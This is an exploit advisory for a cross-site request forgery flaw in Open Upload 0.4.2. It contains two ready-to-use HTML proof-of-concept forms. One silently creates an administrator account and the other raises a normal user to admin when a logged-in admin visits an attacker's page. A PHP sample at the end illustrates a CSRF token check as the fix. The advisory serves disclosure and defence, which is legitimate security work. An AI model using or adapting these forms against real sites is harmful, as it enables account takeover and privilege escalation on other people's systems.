================================================================================================================
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
================================================================================================================
# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
# Exploit Author : Vinesh Redkar (@b0rn2pwn)
# Email : vineshredkar89[at]gmail[d0t]com
# Date: 21/07/2016
# Vendor Homepage: http://openupload.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openupload/
# Version: 0.4.2
# Tested on: Windows 10 OS

The Open Upload application is vulnerable to a CSRF attack (no CSRF token is in place), meaning
that if an admin user can be tricked into visiting a crafted URL created by an
attacker (via spear phishing/social engineering), the forged request is carried out with the admin's session.
Once exploited, the attacker can log in as the admin using the username and the password he posted in the form.

======================CSRF POC (Adding New user with Admin Privileges)==================================
CSRF PoC Code
<html>
<head><title>Remote Admin Add CSRF Exploit</title></head>
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers"/>
<input type="hidden" name="step" value="2"/>
<input type="hidden" name="adduserlogin" value="attacker"/>
<input type="hidden" name="adduserpassword" value="attacker"/>
<input type="hidden" name="adduserrepassword" value="attacker"/>
<input type="hidden" name="addusername" value="attacker"/>
<input type="hidden" name="adduseremail" value="attacker@gmail.com"/>
<input type="hidden" name="addusergroup" value="admins"/>
<input type="hidden" name="adduserlang" value="en"/>
<input type="hidden" name="adduseractive" value="1"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>

======================CSRF POC (Changing privileges from normal user to administrator)==================================
<html>
<head><title>Change privilege normal user to administer CSRF Exploit</title></head>
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers"/>
<input type="hidden" name="step" value="3"/>
<input type="hidden" name="login" value="normal user"/>
<input type="hidden" name="edituserpassword" value=""/>
<input type="hidden" name="edituserrepassword" value=""/>
<input type="hidden" name="editusername" value="normaluser"/>
<input type="hidden" name="edituseremail" value="normaluser@gmail.com"/>
<input type="hidden" name="editusergroup" value="admins"/>
<input type="hidden" name="edituserlang" value="en"/>
<input type="hidden" name="edituseractive" value="1"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
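
A session-bound token check of the kind the advisory reports as missing, shown here as an added example that is neither Open Upload's code nor the advisory author's. The function names, the `csrf_token` field name and the PHP 7+ target are assumptions, and the sample requests are constructed.

```php
<?php
// Added example, not Open Upload code. All names below are hypothetical.

// Issue (or reuse) a random token bound to the user's session.
function csrf_issue(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every admin form that changes state.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_issue($session), ENT_QUOTES) . '"/>';
}

// True only when the POST carries the session's token (constant-time compare).
function csrf_valid(array $session, array $post): bool {
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== '' && hash_equals($expected, $supplied);
}

// Gate for the requests in the PoC: action=adminusers with step 2 (add) or 3 (edit).
function admin_post_allowed(array $session, array $post): bool {
    $stateChanging = ($post['action'] ?? '') === 'adminusers'
        && in_array($post['step'] ?? '', ['2', '3'], true);
    return !$stateChanging || csrf_valid($session, $post);
}

// Constructed demo data: an admin session and two POST bodies.
$session = [];                       // stands in for $_SESSION
$token   = csrf_issue($session);
$forged  = ['action' => 'adminusers', 'step' => '2',
            'adduserlogin' => 'example', 'addusergroup' => 'admins'];
$genuine = $forged + ['csrf_token' => $token];

var_dump(admin_post_allowed($session, $forged));   // cross-site form: carries no token
var_dump(admin_post_allowed($session, $genuine));  // form rendered by the application
```

In a real fix the check belongs on every state-changing request, not only the two steps shown in the PoC, and the token must be rendered into each form the application serves.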